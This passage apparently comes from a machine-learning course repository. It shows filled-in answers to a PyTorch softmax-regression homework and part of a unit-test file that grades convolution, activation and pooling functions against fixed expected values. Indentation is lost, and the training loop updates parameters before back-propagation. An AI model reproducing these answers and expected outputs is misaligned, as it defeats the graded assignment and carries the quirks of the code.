#*******************************************
return Read_and_Agree
#----------------------------------------------------
'''
Given a softmax regression model with parameters W and b, please compute the linear logits z on a mini-batch of data samples x1, x2, ... x_batch_size. In the mean time, please also connect the global gradients of the linear logits z (dL_dz) with the global gradients of the weights dL_dW and the biases dL_db in the PyTorch tensors.
---- Inputs: --------
* x: the feature vectors of a mini-batch of data samples, a float torch tensor of shape (batch_size, p).
* W: the weight matrix of softmax regression, a float torch Tensor of shape (p by c).
* b: the bias values of softmax regression, a float torch vector of length c.
---- Outputs: --------
* z: the linear logits on a mini-batch of data samples, a float torch tensor of shape (batch_size, c).
---- Hints: --------
* When computing z values, in order to connect the global gradients dL_dz with dL_dW and dL_db, you may want to use the operators in PyTorch, instead of in NumPy or Python. For example, np.dot() is the numpy product of two numpy arrays, which will only compute the values z correctly, but cannot connect the global gradients of the torch tensors W and b. Instead, you may want to find the PyTorch version of dot product for two torch tensors.
* For PyTorch tensors, A@B represents the matrix multiplication between two torch matrices A and B.
* This problem can be solved using 1 line(s) of code.
'''
#---------------------
def compute_z(x, W, b):
#########################################
## INSERT YOUR CODE HERE (2 points)
z = x@W + b
#########################################
return z
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test1.py:test_compute_z
--- OR ----
python3 -m nose -v test1.py:test_compute_z
--- OR ----
python -m nose -v test1.py:test_compute_z
---------------------------------------------------
'''
#----------------------------------------------------
'''
Suppose we are given a softmax regression model and we have already computed the linear logits z on a mini-batch of training samples. Suppose the labels of the training samples are in y. Please compute the average loss of the softmax regression model on the mini-batch of training samples. In the mean time, please also connect the global gradients of the linear logits z (dL_dz) with the loss L correctly.
---- Inputs: --------
* z: the linear logits on a mini-batch of data samples, a float torch tensor of shape (batch_size, c).
* y: the labels of a mini-batch of data samples, a torch integer vector of length batch_size. The value of each element can be 0,1,2, ..., or (c-1).
---- Outputs: --------
* L: the average multi-class cross entropy loss on a mini-batch of training samples, a torch float scalar.
---- Hints: --------
* The loss L is a scalar, computed from the average of the cross entropy loss on all samples in the mini-batch. For example, if the loss on the four training samples are 0.1, 0.2, 0.3, 0.4, then the final loss L is the average of these numbers as (0.1+0.2+0.3+0.4)/4 = 0.25.
* You could use CrossEntropyLoss in PyTorch to compute the loss.
* This problem can be solved using 1 line(s) of code.
'''
#---------------------
def compute_L(z, y):
#########################################
## INSERT YOUR CODE HERE (2 points)
L = th.nn.CrossEntropyLoss(reduction='mean')(z, y)
#########################################
return L
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test1.py:test_compute_L
--- OR ----
python3 -m nose -v test1.py:test_compute_L
--- OR ----
python -m nose -v test1.py:test_compute_L
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Gradient Descent) Suppose we are given a softmax regression model with parameters (W and b) and we have a mini-batch of training data samples (x,y). Suppose we have already computed the global gradients of the average loss L w.r.t. the weights W on the mini-batch of data samples. Assume that we have already created an optimizer for the parameter W and b. Please update the weights W and b using gradient descent. After the update, the global gradients of W and b should be set to all zeros.
---- Inputs: --------
* optimizer: a PyTorch optimizer (such as SGD, ADAM, RMSProp) to handle the gradient descent for parameters in the model (W and b).
---- Hints: --------
* Although the parameters W and b are NOT given explicitly in the input of this function, but we can assume the W and b are already properly configured in the optimizer. So the optimizer is configured to handle the parameters W and b.
* Although the gradients of the parameters dL_dW and dL_db are NOT given explicitly in the input of this function, but we can assume that in the PyTorch tensors W and b, the gradients are already properly computed and are stored in W.grad (for dL_dW) and b.grad (for dL_db).
* Although the learning rate is NOT given explicitly in the input of this function, but we can assume that the optimizer was already configured with the learning rate parameter.
* This problem can be solved using 2 line(s) of code.
'''
#---------------------
def update_parameters(optimizer):
#########################################
## INSERT YOUR CODE HERE (2 points)
optimizer.step()
optimizer.zero_grad()
#########################################
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test1.py:test_update_parameters
--- OR ----
python3 -m nose -v test1.py:test_update_parameters
--- OR ----
python -m nose -v test1.py:test_update_parameters
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Training Softmax Regression) Given a training dataset X (features), Y (labels) in a data loader, train the softmax regression model using mini-batch stochastic gradient descent: iteratively update the weights W and biases b using the gradients on each mini-batch of random data samples. We repeat n_epoch passes over all the training samples.
---- Inputs: --------
* data_loader: the PyTorch loader of a dataset.
* c: the number of classes in the classification task, an integer scalar.
* p: the number of input features.
* alpha: the step-size parameter of gradient descent, a float scalar.
* n_epoch: the number of passes to go through the training dataset in the training process, an integer scalar.
---- Outputs: --------
* W: the weight matrix of softmax regression, a float torch Tensor of shape (p by c).
* b: the bias values of softmax regression, a float torch vector of length c.
---- Hints: --------
* Step 1 Forward pass: compute the linear logits and loss.
* Step 2 Back propagation: compute the gradients of W and b.
* Step 3 Gradient descent: update the parameters W and b using gradient descent.
* This problem can be solved using 4 line(s) of code.
'''
#---------------------
def train(data_loader, c, p, alpha=0.001, n_epoch=100):
W = th.randn(p,c, requires_grad=True) # initialize W randomly using standard normal distribution
b = th.zeros(c, requires_grad=True) # initialize b as all zeros
optimizer = th.optim.SGD([W,b], lr=alpha) # SGD optimizer
for _ in range(n_epoch): # iterate through the dataset n_epoch times
for mini_batch in data_loader: # iterate through the dataset, with one mini-batch of random training samples (x,y) at a time
x=mini_batch[0] # the feature vectors of the data samples in a mini-batch
y=mini_batch[1] # the labels of the samples in a mini-batch
#########################################
## INSERT YOUR CODE HERE (2 points)
update_parameters(optimizer)
z = compute_z(x, W, b)
L = compute_L(z, y)
L.backward()
#########################################
return W, b
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test1.py:test_train
--- OR ----
python3 -m nose -v test1.py:test_train
--- OR ----
python -m nose -v test1.py:test_train
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Using Softmax Regression) Given a trained softmax regression model with parameters W and b. Suppose we have a mini-batch of test data samples. Please use the softmax regression model to predict the labels.
---- Inputs: --------
* x: the feature vectors of a mini-batch of data samples, a float torch tensor of shape (batch_size, p).
* W: the weight matrix of softmax regression, a float torch Tensor of shape (p by c).
* b: the bias values of softmax regression, a float torch vector of length c.
---- Outputs: --------
* y_predict: the predicted labels of a mini-batch of test data samples, a torch integer vector of length batch_size. y_predict[i] represents the predicted label on the i-th test sample in the mini-batch.
---- Hints: --------
* This is a multi-class classification task, for each sample, the label should be predicted as the index of the largest value of each row of the linear logit z.
* You could use the argmax() function in PyTorch to return the indices of the largest values in a tensor.
* This problem can be solved using 2 line(s) of code.
'''
#---------------------
def predict(x, W, b):
#########################################
## INSERT YOUR CODE HERE (4 points)
z = compute_z(x, W, b)
y_predict = th.argmax(z, 1)
#########################################
return y_predict
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test1.py:test_predict
--- OR ----
python3 -m nose -v test1.py:test_predict
--- OR ----
python -m nose -v test1.py:test_predict
---------------------------------------------------
'''
#--------------------------------------------
'''
TEST problem 1:
Now you can test the correctness of all the above functions by typing the following in the terminal:
---------------------------------------------------
nosetests -v test1.py
--- OR ----
python3 -m nose -v test1.py
--- OR ----
python -m nose -v test1.py
---------------------------------------------------
If your code passed all the tests, you will see the following message in the terminal:
----------- Problem 1 (12 points in total)--------------------- ... ok
* (2 points) compute_z ... ok
* (2 points) compute_L ... ok
* (2 points) update_parameters ... ok
* (2 points) train ... ok
* (4 points) predict ... ok
----------------------------------------------------------------------
Ran 5 tests in 1.489s
OK
'''
#--------------------------------------------
#--------------------------------------------
'''
List of All Variables
* n: the number of data instance in the training set.
* p: the number of input features.
* c: the number of classes in the classification task, an integer scalar.
* batch_size: the number of samples in a mini-batch, an integer scalar.
* x: the feature vectors of a mini-batch of data samples, a float torch tensor of shape (batch_size, p).
* y: the labels of a mini-batch of data samples, a torch integer vector of length batch_size. The value of each element can be 0,1,2, ..., or (c-1).
* W: the weight matrix of softmax regression, a float torch Tensor of shape (p by c).
* b: the bias values of softmax regression, a float torch vector of length c.
* z: the linear logits on a mini-batch of data samples, a float torch tensor of shape (batch_size, c).
* a: the softmax activations on a mini-batch of data samples, a float torch tensor of shape (batch_size, c).
* L: the average multi-class cross entropy loss on a mini-batch of training samples, a torch float scalar.
* data_loader: the PyTorch loader of a dataset.
* alpha: the step-size parameter of gradient descent, a float scalar.
* n_epoch: the number of passes to go through the training dataset in the training process, an integer scalar.
* y_predict: the predicted labels of a mini-batch of test data samples, a torch integer vector of length batch_size. y_predict[i] represents the predicted label on the i-th test sample in the mini-batch.
* optimizer: a PyTorch optimizer (such as SGD, ADAM, RMSProp) to handle the gradient descent for parameters in the model (W and b).
'''
#--------------------------------------------
```
#### File: CS-539-Machine-Learning/homework3/test2.py
```python
from problem2 import *
import sys
import math
import torch as th
from torch.utils.data import Dataset, DataLoader
from torch import Tensor
'''
Unit test 2:
This file includes unit tests for problem2.py.
'''
#-------------------------------------------------------------------------
def test_python_version():
''' ----------- Problem 2 (32 points in total)---------------------'''
assert sys.version_info[0]==3 # require python 3.6 or above
assert sys.version_info[1]>=6
#---------------------------------------------------
def test_conv2d_a():
''' (2 points) conv2d_a'''
# an image of 6 by 8 pixels
# h = 6, w = 8
x1 = th.tensor([[0.,1.,0.,0.,0.,0.,0.,0.],
[1.,1.,1.,0.,0.,0.,0.,0.],
[0.,1.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,1.,0.],
[0.,0.,0.,0.,0.,1.,1.,1.],
[0.,0.,0.,0.,0.,0.,1.,0.]])
# a filter of shape 3 x 3, trying to match a pattern '+' in the image
w1 = th.tensor([[0.,1.,0.],
[1.,1.,1.],
[0.,1.,0.]], requires_grad=True)
b1 = th.tensor(-4., requires_grad=True)
z1 = conv2d_a(x1,w1,b1)
assert type(z1) == Tensor
assert np.allclose(z1.size(),(4,6))
z1_true = [[ 1.,-2.,-3.,-4.,-4.,-4.],
[-2.,-2.,-4.,-4.,-4.,-3.],
[-3.,-4.,-4.,-4.,-2.,-2.],
[-4.,-4.,-4.,-3.,-2., 1.]]
assert np.allclose(z1.data,z1_true, atol=0.1)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in z)
L = z1.sum()
# back propagation
L.backward()
# check the gradients of w1, b1
dL_dw1_true = [[5., 5., 2.],
[5., 6., 5.],
[2., 5., 5.]]
assert np.allclose(w1.grad, dL_dw1_true, atol= 0.1)
assert np.allclose(b1.grad, 24, atol= 0.1)
# test another example:
# an image of 4 by 4 pixels
x1 = th.tensor([[1.,2.,3.,0.],
[1.,2.,3.,0.],
[2.,3.,4.,0.],
[0.,0.,0.,0.]])
# a filter of shape 3 x 3
w1 = th.tensor([[1.,2.,3.],
[2.,3.,4.],
[3.,1.,5.]], requires_grad=True)
b1 = th.tensor(-5., requires_grad=True)
z1 = conv2d_a(x1,w1,b1)
assert type(z1) == Tensor
assert np.allclose(z1.size(),(2,2))
z1_true = [[58., 29.],
[38., 21.]]
assert np.allclose(z1.data,z1_true, atol=0.1)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in z)
L = z1.sum()
# back propagation
L.backward()
# check the gradients of w1, b1
dL_dw1_true = [[ 6., 10., 6.],
[ 8., 12., 7.],
[ 5., 7., 4.]]
assert np.allclose(w1.grad, dL_dw1_true, atol= 0.1)
assert np.allclose(b1.grad, 4, atol= 0.1)
# test the function with random input sizes
s = np.random.randint(2,5) # size of the filter
h = s+np.random.randint(5,20) # hight of the image
w = s+np.random.randint(5,20) # width of the image
x1 = th.randn(h,w)
W1 = th.randn(s,s)
b1 = th.randn(1)
z1 = conv2d_a(x1,W1,b1)
assert np.allclose(z1.size(),(h-s+1,w-s+1))
#---------------------------------------------------
def test_conv2d_b():
''' (2 points) conv2d_b'''
# an image of 6 by 8 pixels with 3 color/input channels (shape: 3 channel x 6 height x 8 width)
# l = 3, h = 6, w = 8
x2 = th.tensor([
[[1.,0.,1.,0.,0.,0.,0.,0.],
[1.,0.,1.,0.,0.,0.,0.,0.],
[1.,0.,1.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,1.,0.,1.],
[0.,0.,0.,0.,0.,1.,0.,1.],
[0.,0.,0.,0.,0.,1.,0.,1.]], # the first/red channel of the image
[[0.,1.,0.,0.,0.,0.,0.,0.],
[1.,1.,1.,0.,0.,0.,0.,0.],
[0.,1.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,1.,0.],
[0.,0.,0.,0.,0.,1.,1.,1.],
[0.,0.,0.,0.,0.,0.,1.,0.]],# the second/green channel of the image
[[1.,0.,1.,0.,0.,0.,0.,0.],
[0.,1.,0.,0.,0.,0.,0.,0.],
[1.,0.,1.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,1.,0.,1.],
[0.,0.,0.,0.,0.,0.,1.,0.],
[0.,0.,0.,0.,0.,1.,0.,1.]] # the third/blue channel of the image
])
# one filter of shape 3 x 3 with 3 channels (shape: 3 channels x 3 height x 3 width )
w2 = th.tensor([
[[1.,0.,1.],
[1.,0.,1.],
[1.,0.,1.]], # the first channel of the filter, trying to match a red-colored pattern '| |'
[[0.,1.,0.],
[1.,1.,1.],
[0.,1.,0.]], # the second channel of the filter, trying to match a green-colored pattern '+'
[[1.,0.,1.],
[0.,1.,0.],
[1.,0.,1.]] # the third channel of the filter, trying to match a blue-colored pattern 'X'
], requires_grad= True)
b2 = th.tensor(-15., requires_grad = True)
z2 = conv2d_b(x2,w2,b2)
assert type(z2) == Tensor
assert np.allclose(z2.size(),(4,6))
z2_true = [[ 1., -13., -9., -15., -15., -15.],
[ -9., -11., -13., -13., -15., -10.],
[-10., -15., -13., -13., -11., -9.],
[-15., -15., -15., -9., -13., 1.]]
assert np.allclose(z2.data,z2_true, atol=0.1)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in z)
L = z2.sum()
# back propagation
L.backward()
# check the gradients of w, b
dL_dw2_true = [[[7., 4., 5.],
[6., 4., 6.],
[5., 4., 7.]],
[[5., 5., 2.],
[5., 6., 5.],
[2., 5., 5.]],
[[6., 4., 4.],
[4., 4., 4.],
[4., 4., 6.]]]
assert np.allclose(w2.grad, dL_dw2_true, atol= 0.1)
assert np.allclose(b2.grad, 24, atol= 0.1)
# test the function with random input sizes
s = np.random.randint(3,5) # size of the filter
h = s+np.random.randint(5,20) # hight of the image
w = s+np.random.randint(5,20) # width of the image
l = np.random.randint(2,10) # number of channels
x2 = th.randn(l,h,w)
W2 = th.randn(l,s,s)
b2= th.randn(1)
z2= conv2d_b(x2,W2,b2)
assert np.allclose(z2.size(),(h-s+1,w-s+1))
#---------------------------------------------------
def test_conv2d_c():
''' (2 points) conv2d_c'''
# an image of 6 by 8 pixels with 3 color/input channels (shape: 3 channel x 6 height x 8 width )
# l = 3, h = 6, w = 8
x3 = th.tensor([
[[1.,0.,1.,0.,0.,0.,1.,0.],
[1.,0.,1.,0.,0.,1.,0.,1.],
[1.,0.,1.,0.,0.,0.,1.,0.],
[0.,1.,0.,0.,0.,1.,0.,1.],
[1.,0.,1.,0.,0.,1.,0.,1.],
[0.,1.,0.,0.,0.,1.,0.,1.]], # the first/red channel of the image
[[0.,1.,0.,0.,0.,1.,1.,1.],
[1.,1.,1.,0.,0.,0.,0.,0.],
[0.,1.,0.,0.,0.,1.,1.,1.],
[1.,1.,1.,0.,0.,0.,1.,0.],
[0.,0.,0.,0.,0.,1.,1.,1.],
[1.,1.,1.,0.,0.,0.,1.,0.]],# the second/green channel of the image
[[1.,0.,1.,0.,0.,1.,0.,1.],
[0.,1.,0.,0.,0.,0.,1.,0.],
[1.,0.,1.,0.,0.,0.,1.,0.],
[1.,0.,1.,0.,0.,1.,0.,1.],
[0.,1.,0.,0.,0.,0.,1.,0.],
[0.,1.,0.,0.,0.,1.,0.,1.]] # the third/blue channel of the image
])
# 2 filters of shape 3 x 3 with 3 channels (shape: 2 filters x 3 channels x 3 hight x 3 width)
w3 = th.tensor([
#---------- the first filter with 3 input channels ------
[
[[1.,0.,1.],
[1.,0.,1.],
[1.,0.,1.]], # the first channel of the filter, trying to match a red-colored pattern '| |'
[[0.,1.,0.],
[1.,1.,1.],
[0.,1.,0.]], # the second channel of the filter, trying to match a green-colored pattern '+'
[[1.,0.,1.],
[0.,1.,0.],
[1.,0.,1.]] # the third channel of the filter, trying to match a blue-colored pattern 'X'
],
#---------- the second filter with 3 input channels ------
[
[[0.,1.,0.],
[1.,0.,1.],
[0.,1.,0.]], # the first channel of the filter, trying to match a red-colored pattern 'O'
[[1.,1.,1.],
[0.,0.,0.],
[1.,1.,1.]], # the second channel of the filter, trying to match a green-colored pattern '='
[[1.,0.,1.],
[0.,1.,0.],
[0.,1.,0.]] # the third channel of the filter, trying to match a blue-colored pattern 'X'
]
#---------------------------------------------------------
], requires_grad=True)
b3 = th.tensor([-15., # the bias for the first filter
-13.], # the bias for the second filter
requires_grad=True)
z3 = conv2d_c(x3,w3,b3)
assert type(z3) == Tensor
assert np.allclose(z3.size(),(2,4,6))
z3_true = [[[ 1., -13., -9., -13., -10., -8.], # outputs of the first filter
[ -6., -9., -12., -11., -11., -4.],
[ -5., -10., -11., -13., -8., -8.],
[ -8., -10., -13., -9., -13., 1.]],
[[ -6., -8., -11., -9., -9., 1.], # outputs of the second filter
[ -4., -5., -10., -13., -7., -11.],
[ -9., -8., -12., -10., -6., -3.],
[ 1., -9., -9., -11., -8., -6.]]]
assert np.allclose(z3.data,z3_true, atol=0.1)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in z)
L = z3.sum()
# back propagation
L.backward()
# check the gradients of w, b
dL_dw3_true = [[[[ 9., 8., 9.],
[10., 8., 10.],
[ 9., 8., 9.]],
[[10., 11., 9.],
[ 9., 10., 9.],
[ 9., 11., 10.]],
[[ 9., 8., 9.],
[ 7., 8., 7.],
[ 8., 8., 8.]]],
[[[ 9., 8., 9.],
[10., 8., 10.],
[ 9., 8., 9.]],
[[10., 11., 9.],
[ 9., 10., 9.],
[ 9., 11., 10.]],
[[ 9., 8., 9.],
[ 7., 8., 7.],
[ 8., 8., 8.]]]]
assert np.allclose(w3.grad, dL_dw3_true, atol= 0.1)
assert np.allclose(b3.grad, [24,24], atol= 0.1)
# test the function with random input sizes
s = np.random.randint(2,5) # size of the filter
h = s+np.random.randint(5,20) # hight of the image
w = s+np.random.randint(5,20) # width of the image
l = np.random.randint(2,10) # number of channels
n_filters = np.random.randint(2,10) # number of filters
x3 = th.randn(l,h,w)
W3 = th.randn(n_filters, l,s,s)
b3 = th.randn(n_filters)
z3 = conv2d_c(x3,W3,b3)
assert np.allclose(z3.size(),(n_filters, h-s+1,w-s+1))
#---------------------------------------------------
def test_compute_z1():
''' (2 points) compute_z1'''
# 2 images of 6 by 8 pixels with 3 color/input channels (shape: 3 channel x 6 height x 8 width )
# n = 2, c = 3, h = 6, w = 8
x = th.tensor([
#---------- the first image in the mini-batch ------
[[[0.,0.,1.,0.,1.,0.,1.,0.],
[0.,1.,0.,1.,1.,0.,1.,0.],
[0.,0.,1.,0.,1.,0.,1.,0.],
[0.,1.,0.,1.,0.,1.,0.,0.],
[0.,1.,0.,1.,1.,0.,1.,0.],
[0.,1.,0.,1.,0.,1.,0.,0.]], # the first/red channel of the image
[[0.,1.,1.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,1.,1.,1.,0.],
[0.,1.,1.,1.,0.,1.,0.,0.],
[0.,0.,1.,0.,1.,1.,1.,0.],
[0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,1.,0.,1.,1.,1.,0.]],# the second/green channel of the image
[[0.,1.,0.,1.,1.,0.,1.,0.],
[0.,0.,1.,0.,0.,1.,0.,0.],
[0.,0.,1.,0.,1.,0.,1.,0.],
[0.,1.,0.,1.,1.,0.,1.,0.],
[0.,0.,1.,0.,0.,1.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,0.]]], # the third/blue channel of the image
#---------- the second image in the mini-batch ------
[[[1.,0.,1.,0.,0.,0.,1.,0.],
[1.,0.,1.,0.,0.,1.,0.,1.],
[1.,0.,1.,0.,0.,0.,1.,0.],
[0.,1.,0.,0.,0.,1.,0.,1.],
[1.,0.,1.,0.,0.,1.,0.,1.],
[0.,1.,0.,0.,0.,1.,0.,1.]], # the first/red channel of the image
[[0.,1.,0.,0.,0.,1.,1.,1.],
[1.,1.,1.,0.,0.,0.,0.,0.],
[0.,1.,0.,0.,0.,1.,1.,1.],
[1.,1.,1.,0.,0.,0.,1.,0.],
[0.,0.,0.,0.,0.,1.,1.,1.],
[1.,1.,1.,0.,0.,0.,1.,0.]],# the second/green channel of the image
[[1.,0.,1.,0.,0.,1.,0.,1.],
[0.,1.,0.,0.,0.,0.,1.,0.],
[1.,0.,1.,0.,0.,0.,1.,0.],
[1.,0.,1.,0.,0.,1.,0.,1.],
[0.,1.,0.,0.,0.,0.,1.,0.],
[0.,1.,0.,0.,0.,1.,0.,1.]]] # the third/blue channel of the image
])
# 2 filters of shape 3 x 3 with 3 channels (shape: 2 filters x 3 channels x 3 hight x 3 width)
W = th.tensor( [
#---------- the first filter with 3 input channels ------
[
[[1.,0.,1.],
[1.,0.,1.],
[1.,0.,1.]], # the first channel of the filter, trying to match a red-colored pattern '| |'
[[0.,1.,0.],
[1.,1.,1.],
[0.,1.,0.]], # the second channel of the filter, trying to match a green-colored pattern '+'
[[1.,0.,1.],
[0.,1.,0.],
[1.,0.,1.]] # the third channel of the filter, trying to match a blue-colored pattern 'X'
],
#---------- the second filter with 3 input channels ------
[
[[0.,1.,0.],
[1.,0.,1.],
[0.,1.,0.]], # the first channel of the filter, trying to match a red-colored pattern 'O'
[[1.,1.,1.],
[0.,0.,0.],
[1.,1.,1.]], # the second channel of the filter, trying to match a green-colored pattern '='
[[1.,0.,1.],
[0.,1.,0.],
[0.,1.,0.]] # the third channel of the filter, trying to match a blue-colored pattern 'X'
]
#---------------------------------------------------------
], requires_grad=True)
b = th.tensor([-15., # the bias for the first filter
-13.], # the bias for the second filter
requires_grad=True)
z = compute_z1(x,W,b)
assert type(z) == Tensor
assert np.allclose(z.size(),(2,2,4,6))
#---------- the output on the first image in the mini-batch ------
z_true = [[[[-10., -8., -4., -11., 1., -13.],
[-11., -4., -8., -5., -6., -9.],
[ -8., -8., -4., -8., -5., -10.],
[-13., 1., -11., -4., -8., -10.]], # outputs of the first filter
[[ -9., 1., -7., -4., -6., -8.],
[ -7., -11., -4., -5., -4., -5.],
[ -6., -3., -5., -5., -9., -8.],
[ -8., -6., -4., -7., 1., -9.]]], # outputs of the second filter
#---------- the output on the second image in the mini-batch ------
[[[ 1., -13., -9., -13., -10., -8.],
[ -6., -9., -12., -11., -11., -4.],
[ -5., -10., -11., -13., -8., -8.],
[ -8., -10., -13., -9., -13., 1.]], # outputs of the first filter
[[ -6., -8., -11., -9., -9., 1.],
[ -4., -5., -10., -13., -7., -11.],
[ -9., -8., -12., -10., -6., -3.],
[ 1., -9., -9., -11., -8., -6.]]]] # outputs of the second filter
assert np.allclose(z.data,z_true, atol=0.1)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in z)
L = z.sum()
# back propagation
L.backward()
# check the gradients of w, b
dL_dW_true = [[[[19., 21., 20.],
[21., 22., 21.],
[20., 21., 19.]],
[[23., 26., 22.],
[21., 24., 21.],
[22., 26., 23.]],
[[19., 21., 20.],
[16., 19., 17.],
[18., 20., 18.]]],
[[[19., 21., 20.],
[21., 22., 21.],
[20., 21., 19.]],
[[23., 26., 22.],
[21., 24., 21.],
[22., 26., 23.]],
[[19., 21., 20.],
[16., 19., 17.],
[18., 20., 18.]]]]
assert np.allclose(W.grad, dL_dW_true, atol= 0.1)
assert np.allclose(b.grad, [48,48], atol= 0.1)
# test the function with random input sizes
n = np.random.randint(2,10) # batch size
s = np.random.randint(2,5) # size of the filter
h = s+np.random.randint(5,20) # hight of the image
w = s+np.random.randint(5,20) # width of the image
l = np.random.randint(2,10) # number of channels
n_filters = np.random.randint(2,10) # number of filters
x = th.randn(n,l,h,w)
W = th.randn(n_filters, l,s,s)
b = th.randn(n_filters)
z = compute_z1(x,W,b)
assert np.allclose(z.size(),(n,n_filters, h-s+1,w-s+1))
#---------------------------------------------------
def test_compute_a1():
''' (2 points) compute_a1'''
# n=2, 2 filters, h = 4, w = 6
#---------- the linear logits on the first image in the mini-batch ------
z =th.tensor([[[[-10., -8., -4., -11., 1., -13.],
[-11., -4., -8., -5., -6., -9.],
[ -8., -8., -4., -8., -5., -10.],
[-13., 1., -11., -4., -8., -10.]], # outputs of the first filter
[[ -9., 1., -7., -4., -6., -8.],
[ -7., -11., -4., -5., -4., -5.],
[ -6., -3., -5., -5., -9., -8.],
[ -8., -6., -4., -7., 1., -9.]]], # outputs of the second filter
#---------- the linear logits on the second image in the mini-batch ------
[[[ 1., -13., -9., -13., -10., -8.],
[ -6., -9., -12., -11., -11., -4.],
[ -5., -10., -11., -13., -8., -8.],
[ -8., -10., -13., -9., -13., 1.]], # outputs of the first filter
[[ -6., -8., -11., -9., -9., 1.],
[ -4., -5., -10., -13., -7., -11.],
[ -9., -8., -12., -10., -6., -3.],
[ 1., -9., -9., -11., -8., -6.]]]], # outputs of the second filter
requires_grad=True)
a = compute_a1(z)
# check value
assert type(a) == Tensor
assert np.allclose(a.size(),(2,2,4,6))
#---------- the activations on the first image in the mini-batch ------
a_true = [[[[0., 0., 0., 0., 1., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 1., 0., 0., 0., 0.]],
[[0., 1., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 1., 0.]]],
#---------- the activations on the second image in the mini-batch ------
[[[1., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 1.]],
[[0., 0., 0., 0., 0., 1.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[1., 0., 0., 0., 0., 0.]]]]
assert np.allclose(a.data, a_true)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in a)
L = a.sum()
# back propagation
L.backward()
# check the gradients dL_dz, which happens to equal to a_true in this test case.
assert np.allclose(z.grad, a_true, atol= 0.1)
# test the function with random input sizes
n = np.random.randint(2,10) # batch size
h = np.random.randint(5,20) # hight of the image
w = np.random.randint(5,20) # width of the image
n_filters = np.random.randint(2,10) # number of filters
z = th.randn(n,n_filters,h,w)
a = compute_a1(z)
assert np.allclose(a.size(),(n,n_filters, h,w))
#---------------------------------------------------
def test_compute_p1():
''' (2 points) compute_p1'''
#---------- the activations on the first image in the mini-batch ------
a = th.tensor([[[[0., 0., 0., 0., 1., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 1., 0., 0., 0., 0.]],
[[0., 1., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 1., 0.]]],
#---------- the activations on the second image in the mini-batch ------
[[[1., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 1.]],
[[0., 0., 0., 0., 0., 1.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[1., 0., 0., 0., 0., 0.]]]],
requires_grad=True)
p = compute_p1(a)
# check value
assert type(p) == Tensor
assert np.allclose(p.size(),(2,2,2,3))
#---------- the pooled features on the first image in the mini-batch ------
p_true = [[[[0., 0., 1.],
[1., 0., 0.]],
[[1., 0., 0.],
[0., 0., 1.]]],
#---------- the pooled features on the second image in the mini-batch ------
[[[1., 0., 0.],
[0., 0., 1.]],
[[0., 0., 1.],
[1., 0., 0.]]]]
assert np.allclose(p.data, p_true)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in p)
L = p.sum()
# back propagation
L.backward()
# check the gradients of w, b
dL_da_true = [[[[1., 0., 1., 0., 1., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 1., 0., 1., 0.],
[0., 1., 0., 0., 0., 0.]],
[[0., 1., 1., 0., 1., 0.],
[0., 0., 0., 0., 0., 0.],
[1., 0., 1., 0., 0., 0.],
[0., 0., 0., 0., 1., 0.]]],
[[[1., 0., 1., 0., 1., 0.],
[0., 0., 0., 0., 0., 0.],
[1., 0., 1., 0., 0., 0.],
[0., 0., 0., 0., 0., 1.]],
[[1., 0., 1., 0., 0., 1.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 1., 0., 1., 0.],
[1., 0., 0., 0., 0., 0.]]]]
assert np.allclose(a.grad, dL_da_true, atol= 0.1)
# test the function with random input sizes
n = np.random.randint(2,10) # batch size
h = np.random.randint(5,20)*2 # hight of the image
w = np.random.randint(5,20)*2 # width of the image
n_filters = np.random.randint(2,10) # number of filters
a = th.randn(n,n_filters,h,w)
p = compute_p1(a)
assert np.allclose(p.size(),(n,n_filters, h/2,w/2))
# check gradient with multiple max values
a = th.tensor([[[[ 0., 1.],
[ 1., 0.]]]],requires_grad=True)
p = compute_p1(a)
t = p.sum()
t.backward()
dL_da_true = [[[[ 0., 1.],
[ 0., 0.]]]]
assert np.allclose(a.grad,dL_da_true,atol=1e-2)
#---------------------------------------------------
def test_compute_z2():
''' (2 points) compute_z2'''
# the pooled feature map of 2 images, the size of the feature map is 6 by 8 pixels with 3 input channels (shape: 3 channel x 6 height x 8 width )
# n= 2, c1 = 3, h = 6, w = 8
p1= th.tensor([
#---------- the feature map of the first image in the mini-batch ------
